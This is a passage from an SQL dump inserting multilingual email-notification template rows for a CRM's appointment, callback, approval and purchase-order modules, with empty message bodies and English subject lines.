(2074, 'appointly', 'appointment-recurring-to-contacts', 'catalan', 'Appointment recurring (Sent to Contact) [catalan]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2075, 'appointly', 'appointment-approved-to-staff', 'catalan', 'Appointment approved (Sent to Staff and Atendees) [catalan]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2076, 'appointly', 'appointment-approved-to-contact', 'catalan', 'Appointment approved (Sent to Contact) [catalan]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2077, 'appointly', 'appointment-submitted-to-staff', 'catalan', 'New appointment request (Sent to Responsible Person) [catalan]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2078, 'appointly', 'callback-assigned-to-staff', 'catalan', 'Assigned to callback (Sent to Staff) [catalan]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2079, 'appointly', 'newcallback-requested-to-staff', 'catalan', 'New callback request (Sent to Callbacks Responsible Person) [catalan]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2080, 'appointly', 'appointly-appointment-request-feedback', 'catalan', 'Request Appointment Feedback (Sent to Client) [catalan]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2081, 'appointly', 'appointly-appointment-feedback-received', 'catalan', 'New Feedback Received (Sent to Responsible Person) [catalan]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2082, 'appointly', 'appointly-appointment-feedback-updated', 'catalan', 'Feedback Updated (Sent to Responsible Person) [catalan]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2083, 'approve', 'send-request-approve', 'catalan', 'Send Approval Request [catalan]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2084, 'approve', 'send_rejected', 'catalan', 'Send Rejected [catalan]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2085, 'approve', 'send_approve', 'catalan', 'Send Approve [catalan]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2086, 'purchase_order', 'purchase-order-to-contact', 'german', 'Purchase Order (Sent to contact) [german]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2087, 'appointly', 'appointment-cron-reminder-to-staff', 'german', 'Appointment reminder (Sent to Staff and Attendees) [german]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2088, 'appointly', 'appointment-recurring-to-staff', 'german', 'Appointment recurring (Sent to Staff and Attendees) [german]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2089, 'appointly', 'appointment-cancelled-to-staff', 'german', 'Appointment cancelled (Sent to Staff and Attendees) [german]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2090, 'appointly', 'appointment-cancelled-to-contact', 'german', 'Appointment cancelled (Sent to Contact) [german]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2091, 'appointly', 'appointment-cron-reminder-to-contact', 'german', 'Appointment reminder (Sent to Contact) [german]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2092, 'appointly', 'appointment-recurring-to-contacts', 'german', 'Appointment recurring (Sent to Contact) [german]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(2093, 'appointly', 'appointment-approved-to-staff', 'german', 'Appointment approved (Sent to Staff and Atendees) [german]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2094, 'appointly', 'appointment-approved-to-contact', 'german', 'Appointment approved (Sent to Contact) [german]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2095, 'appointly', 'appointment-submitted-to-staff', 'german', 'New appointment request (Sent to Responsible Person) [german]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2096, 'appointly', 'callback-assigned-to-staff', 'german', 'Assigned to callback (Sent to Staff) [german]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2097, 'appointly', 'newcallback-requested-to-staff', 'german', 'New callback request (Sent to Callbacks Responsible Person) [german]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2098, 'appointly', 'appointly-appointment-request-feedback', 'german', 'Request Appointment Feedback (Sent to Client) [german]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2099, 'appointly', 'appointly-appointment-feedback-received', 'german', 'New Feedback Received (Sent to Responsible Person) [german]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2100, 'appointly', 'appointly-appointment-feedback-updated', 'german', 'Feedback Updated (Sent to Responsible Person) [german]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2101, 'approve', 'send-request-approve', 'german', 'Send Approval Request [german]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2102, 'approve', 'send_rejected', 'german', 'Send Rejected [german]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2103, 'approve', 'send_approve', 'german', 'Send Approve [german]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2104, 'purchase_order', 'purchase-order-to-contact', 'chinese', 'Purchase Order (Sent to contact) [chinese]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2105, 'appointly', 'appointment-cron-reminder-to-staff', 'chinese', 'Appointment reminder (Sent to Staff and Attendees) [chinese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2106, 'appointly', 'appointment-recurring-to-staff', 'chinese', 'Appointment recurring (Sent to Staff and Attendees) [chinese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2107, 'appointly', 'appointment-cancelled-to-staff', 'chinese', 'Appointment cancelled (Sent to Staff and Attendees) [chinese]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2108, 'appointly', 'appointment-cancelled-to-contact', 'chinese', 'Appointment cancelled (Sent to Contact) [chinese]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2109, 'appointly', 'appointment-cron-reminder-to-contact', 'chinese', 'Appointment reminder (Sent to Contact) [chinese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2110, 'appointly', 'appointment-recurring-to-contacts', 'chinese', 'Appointment recurring (Sent to Contact) [chinese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2111, 'appointly', 'appointment-approved-to-staff', 'chinese', 'Appointment approved (Sent to Staff and Atendees) [chinese]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2112, 'appointly', 'appointment-approved-to-contact', 'chinese', 'Appointment approved (Sent to Contact) [chinese]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2113, 'appointly', 'appointment-submitted-to-staff', 'chinese', 'New appointment request (Sent to Responsible Person) [chinese]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2114, 'appointly', 'callback-assigned-to-staff', 'chinese', 'Assigned to callback (Sent to Staff) [chinese]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2115, 'appointly', 'newcallback-requested-to-staff', 'chinese', 'New callback request (Sent to Callbacks Responsible Person) [chinese]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2116, 'appointly', 'appointly-appointment-request-feedback', 'chinese', 'Request Appointment Feedback (Sent to Client) [chinese]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2117, 'appointly', 'appointly-appointment-feedback-received', 'chinese', 'New Feedback Received (Sent to Responsible Person) [chinese]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2118, 'appointly', 'appointly-appointment-feedback-updated', 'chinese', 'Feedback Updated (Sent to Responsible Person) [chinese]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2119, 'approve', 'send-request-approve', 'chinese', 'Send Approval Request [chinese]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2120, 'approve', 'send_rejected', 'chinese', 'Send Rejected [chinese]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2121, 'approve', 'send_approve', 'chinese', 'Send Approve [chinese]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2122, 'purchase_order', 'purchase-order-to-contact', 'vietnamese', 'Purchase Order (Sent to contact) [vietnamese]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2123, 'appointly', 'appointment-cron-reminder-to-staff', 'vietnamese', 'Appointment reminder (Sent to Staff and Attendees) [vietnamese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2124, 'appointly', 'appointment-recurring-to-staff', 'vietnamese', 'Appointment recurring (Sent to Staff and Attendees) [vietnamese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2125, 'appointly', 'appointment-cancelled-to-staff', 'vietnamese', 'Appointment cancelled (Sent to Staff and Attendees) [vietnamese]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2126, 'appointly', 'appointment-cancelled-to-contact', 'vietnamese', 'Appointment cancelled (Sent to Contact) [vietnamese]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2127, 'appointly', 'appointment-cron-reminder-to-contact', 'vietnamese', 'Appointment reminder (Sent to Contact) [vietnamese]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2128, 'appointly', 'appointment-recurring-to-contacts', 'vietnamese', 'Appointment recurring (Sent to Contact) [vietnamese]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2129, 'appointly', 'appointment-approved-to-staff', 'vietnamese', 'Appointment approved (Sent to Staff and Atendees) [vietnamese]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2130, 'appointly', 'appointment-approved-to-contact', 'vietnamese', 'Appointment approved (Sent to Contact) [vietnamese]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2131, 'appointly', 'appointment-submitted-to-staff', 'vietnamese', 'New appointment request (Sent to Responsible Person) [vietnamese]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2132, 'appointly', 'callback-assigned-to-staff', 'vietnamese', 'Assigned to callback (Sent to Staff) [vietnamese]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2133, 'appointly', 'newcallback-requested-to-staff', 'vietnamese', 'New callback request (Sent to Callbacks Responsible Person) [vietnamese]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2134, 'appointly', 'appointly-appointment-request-feedback', 'vietnamese', 'Request Appointment Feedback (Sent to Client) [vietnamese]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2135, 'appointly', 'appointly-appointment-feedback-received', 'vietnamese', 'New Feedback Received (Sent to Responsible Person) [vietnamese]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2136, 'appointly', 'appointly-appointment-feedback-updated', 'vietnamese', 'Feedback Updated (Sent to Responsible Person) [vietnamese]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2137, 'purchase_order', 'purchase-order-to-contact', 'indonesia', 'Purchase Order (Sent to contact) [indonesia]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2138, 'appointly', 'appointment-cron-reminder-to-staff', 'indonesia', 'Appointment reminder (Sent to Staff and Attendees) [indonesia]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2139, 'appointly', 'appointment-recurring-to-staff', 'indonesia', 'Appointment recurring (Sent to Staff and Attendees) [indonesia]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2140, 'appointly', 'appointment-cancelled-to-staff', 'indonesia', 'Appointment cancelled (Sent to Staff and Attendees) [indonesia]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2141, 'appointly', 'appointment-cancelled-to-contact', 'indonesia', 'Appointment cancelled (Sent to Contact) [indonesia]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2142, 'appointly', 'appointment-cron-reminder-to-contact', 'indonesia', 'Appointment reminder (Sent to Contact) [indonesia]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2143, 'appointly', 'appointment-recurring-to-contacts', 'indonesia', 'Appointment recurring (Sent to Contact) [indonesia]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2144, 'appointly', 'appointment-approved-to-staff', 'indonesia', 'Appointment approved (Sent to Staff and Atendees) [indonesia]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2145, 'appointly', 'appointment-approved-to-contact', 'indonesia', 'Appointment approved (Sent to Contact) [indonesia]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2146, 'appointly', 'appointment-submitted-to-staff', 'indonesia', 'New appointment request (Sent to Responsible Person) [indonesia]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2147, 'appointly', 'callback-assigned-to-staff', 'indonesia', 'Assigned to callback (Sent to Staff) [indonesia]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2148, 'appointly', 'newcallback-requested-to-staff', 'indonesia', 'New callback request (Sent to Callbacks Responsible Person) [indonesia]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2149, 'appointly', 'appointly-appointment-request-feedback', 'indonesia', 'Request Appointment Feedback (Sent to Client) [indonesia]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2150, 'appointly', 'appointly-appointment-feedback-received', 'indonesia', 'New Feedback Received (Sent to Responsible Person) [indonesia]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2151, 'appointly', 'appointly-appointment-feedback-updated', 'indonesia', 'Feedback Updated (Sent to Responsible Person) [indonesia]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2152, 'approve', 'send-request-approve', 'indonesia', 'Send Approval Request [indonesia]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2153, 'approve', 'send_rejected', 'indonesia', 'Send Rejected [indonesia]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2154, 'approve', 'send_approve', 'indonesia', 'Send Approve [indonesia]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2155, 'purchase_order', 'purchase-order-to-contact', 'french', 'Purchase Order (Sent to contact) [french]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2156, 'appointly', 'appointment-cron-reminder-to-staff', 'french', 'Appointment reminder (Sent to Staff and Attendees) [french]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2157, 'appointly', 'appointment-recurring-to-staff', 'french', 'Appointment recurring (Sent to Staff and Attendees) [french]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2158, 'appointly', 'appointment-cancelled-to-staff', 'french', 'Appointment cancelled (Sent to Staff and Attendees) [french]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2159, 'appointly', 'appointment-cancelled-to-contact', 'french', 'Appointment cancelled (Sent to Contact) [french]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2160, 'appointly', 'appointment-cron-reminder-to-contact', 'french', 'Appointment reminder (Sent to Contact) [french]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2161, 'appointly', 'appointment-recurring-to-contacts', 'french', 'Appointment recurring (Sent to Contact) [french]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2162, 'appointly', 'appointment-approved-to-staff', 'french', 'Appointment approved (Sent to Staff and Atendees) [french]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2163, 'appointly', 'appointment-approved-to-contact', 'french', 'Appointment approved (Sent to Contact) [french]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2164, 'appointly', 'appointment-submitted-to-staff', 'french', 'New appointment request (Sent to Responsible Person) [french]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2165, 'appointly', 'callback-assigned-to-staff', 'french', 'Assigned to callback (Sent to Staff) [french]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2166, 'appointly', 'newcallback-requested-to-staff', 'french', 'New callback request (Sent to Callbacks Responsible Person) [french]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2167, 'appointly', 'appointly-appointment-request-feedback', 'french', 'Request Appointment Feedback (Sent to Client) [french]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2168, 'appointly', 'appointly-appointment-feedback-received', 'french', 'New Feedback Received (Sent to Responsible Person) [french]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2169, 'appointly', 'appointly-appointment-feedback-updated', 'french', 'Feedback Updated (Sent to Responsible Person) [french]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2170, 'approve', 'send-request-approve', 'french', 'Send Approval Request [french]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2171, 'approve', 'send_rejected', 'french', 'Send Rejected [french]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2172, 'approve', 'send_approve', 'french', 'Send Approve [french]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2173, 'purchase_order', 'purchase-order-to-contact', 'czech', 'Purchase Order (Sent to contact) [czech]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2174, 'appointly', 'appointment-cron-reminder-to-staff', 'czech', 'Appointment reminder (Sent to Staff and Attendees) [czech]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2175, 'appointly', 'appointment-recurring-to-staff', 'czech', 'Appointment recurring (Sent to Staff and Attendees) [czech]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2176, 'appointly', 'appointment-cancelled-to-staff', 'czech', 'Appointment cancelled (Sent to Staff and Attendees) [czech]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2177, 'appointly', 'appointment-cancelled-to-contact', 'czech', 'Appointment cancelled (Sent to Contact) [czech]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2178, 'appointly', 'appointment-cron-reminder-to-contact', 'czech', 'Appointment reminder (Sent to Contact) [czech]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2179, 'appointly', 'appointment-recurring-to-contacts', 'czech', 'Appointment recurring (Sent to Contact) [czech]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2180, 'appointly', 'appointment-approved-to-staff', 'czech', 'Appointment approved (Sent to Staff and Atendees) [czech]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2181, 'appointly', 'appointment-approved-to-contact', 'czech', 'Appointment approved (Sent to Contact) [czech]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2182, 'appointly', 'appointment-submitted-to-staff', 'czech', 'New appointment request (Sent to Responsible Person) [czech]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2183, 'appointly', 'callback-assigned-to-staff', 'czech', 'Assigned to callback (Sent to Staff) [czech]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2184, 'appointly', 'newcallback-requested-to-staff', 'czech', 'New callback request (Sent to Callbacks Responsible Person) [czech]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2185, 'appointly', 'appointly-appointment-request-feedback', 'czech', 'Request Appointment Feedback (Sent to Client) [czech]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2186, 'appointly', 'appointly-appointment-feedback-received', 'czech', 'New Feedback Received (Sent to Responsible Person) [czech]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2187, 'appointly', 'appointly-appointment-feedback-updated', 'czech', 'Feedback Updated (Sent to Responsible Person) [czech]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2188, 'approve', 'send-request-approve', 'czech', 'Send Approval Request [czech]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2189, 'approve', 'send_rejected', 'czech', 'Send Rejected [czech]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2190, 'approve', 'send_approve', 'czech', 'Send Approve [czech]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2191, 'purchase_order', 'purchase-order-to-contact', 'romanian', 'Purchase Order (Sent to contact) [romanian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2192, 'appointly', 'appointment-cron-reminder-to-staff', 'romanian', 'Appointment reminder (Sent to Staff and Attendees) [romanian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2193, 'appointly', 'appointment-recurring-to-staff', 'romanian', 'Appointment recurring (Sent to Staff and Attendees) [romanian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2194, 'appointly', 'appointment-cancelled-to-staff', 'romanian', 'Appointment cancelled (Sent to Staff and Attendees) [romanian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2195, 'appointly', 'appointment-cancelled-to-contact', 'romanian', 'Appointment cancelled (Sent to Contact) [romanian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2196, 'appointly', 'appointment-cron-reminder-to-contact', 'romanian', 'Appointment reminder (Sent to Contact) [romanian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2197, 'appointly', 'appointment-recurring-to-contacts', 'romanian', 'Appointment recurring (Sent to Contact) [romanian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2198, 'appointly', 'appointment-approved-to-staff', 'romanian', 'Appointment approved (Sent to Staff and Atendees) [romanian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2199, 'appointly', 'appointment-approved-to-contact', 'romanian', 'Appointment approved (Sent to Contact) [romanian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2200, 'appointly', 'appointment-submitted-to-staff', 'romanian', 'New appointment request (Sent to Responsible Person) [romanian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2201, 'appointly', 'callback-assigned-to-staff', 'romanian', 'Assigned to callback (Sent to Staff) [romanian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2202, 'appointly', 'newcallback-requested-to-staff', 'romanian', 'New callback request (Sent to Callbacks Responsible Person) [romanian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2203, 'appointly', 'appointly-appointment-request-feedback', 'romanian', 'Request Appointment Feedback (Sent to Client) [romanian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2204, 'appointly', 'appointly-appointment-feedback-received', 'romanian', 'New Feedback Received (Sent to Responsible Person) [romanian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2205, 'appointly', 'appointly-appointment-feedback-updated', 'romanian', 'Feedback Updated (Sent to Responsible Person) [romanian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2206, 'approve', 'send-request-approve', 'romanian', 'Send Approval Request [romanian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2207, 'approve', 'send_rejected', 'romanian', 'Send Rejected [romanian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2208, 'approve', 'send_approve', 'romanian', 'Send Approve [romanian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2209, 'purchase_order', 'purchase-order-to-contact', 'polish', 'Purchase Order (Sent to contact) [polish]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2210, 'appointly', 'appointment-cron-reminder-to-staff', 'polish', 'Appointment reminder (Sent to Staff and Attendees) [polish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2211, 'appointly', 'appointment-recurring-to-staff', 'polish', 'Appointment recurring (Sent to Staff and Attendees) [polish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2212, 'appointly', 'appointment-cancelled-to-staff', 'polish', 'Appointment cancelled (Sent to Staff and Attendees) [polish]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2213, 'appointly', 'appointment-cancelled-to-contact', 'polish', 'Appointment cancelled (Sent to Contact) [polish]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2214, 'appointly', 'appointment-cron-reminder-to-contact', 'polish', 'Appointment reminder (Sent to Contact) [polish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2215, 'appointly', 'appointment-recurring-to-contacts', 'polish', 'Appointment recurring (Sent to Contact) [polish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2216, 'appointly', 'appointment-approved-to-staff', 'polish', 'Appointment approved (Sent to Staff and Atendees) [polish]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2217, 'appointly', 'appointment-approved-to-contact', 'polish', 'Appointment approved (Sent to Contact) [polish]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2218, 'appointly', 'appointment-submitted-to-staff', 'polish', 'New appointment request (Sent to Responsible Person) [polish]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2219, 'appointly', 'callback-assigned-to-staff', 'polish', 'Assigned to callback (Sent to Staff) [polish]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2220, 'appointly', 'newcallback-requested-to-staff', 'polish', 'New callback request (Sent to Callbacks Responsible Person) [polish]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2221, 'appointly', 'appointly-appointment-request-feedback', 'polish', 'Request Appointment Feedback (Sent to Client) [polish]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2222, 'appointly', 'appointly-appointment-feedback-received', 'polish', 'New Feedback Received (Sent to Responsible Person) [polish]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2223, 'appointly', 'appointly-appointment-feedback-updated', 'polish', 'Feedback Updated (Sent to Responsible Person) [polish]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2224, 'approve', 'send-request-approve', 'polish', 'Send Approval Request [polish]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2225, 'approve', 'send_rejected', 'polish', 'Send Rejected [polish]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2226, 'approve', 'send_approve', 'polish', 'Send Approve [polish]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2227, 'purchase_order', 'purchase-order-to-contact', 'ukrainian', 'Purchase Order (Sent to contact) [ukrainian]', 'Purchase Order', '', '{companyname} | CRM', '', 0, 1, 0),
(2228, 'appointly', 'appointment-cron-reminder-to-staff', 'ukrainian', 'Appointment reminder (Sent to Staff and Attendees) [ukrainian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2229, 'appointly', 'appointment-recurring-to-staff', 'ukrainian', 'Appointment recurring (Sent to Staff and Attendees) [ukrainian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2230, 'appointly', 'appointment-cancelled-to-staff', 'ukrainian', 'Appointment cancelled (Sent to Staff and Attendees) [ukrainian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2231, 'appointly', 'appointment-cancelled-to-contact', 'ukrainian', 'Appointment cancelled (Sent to Contact) [ukrainian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
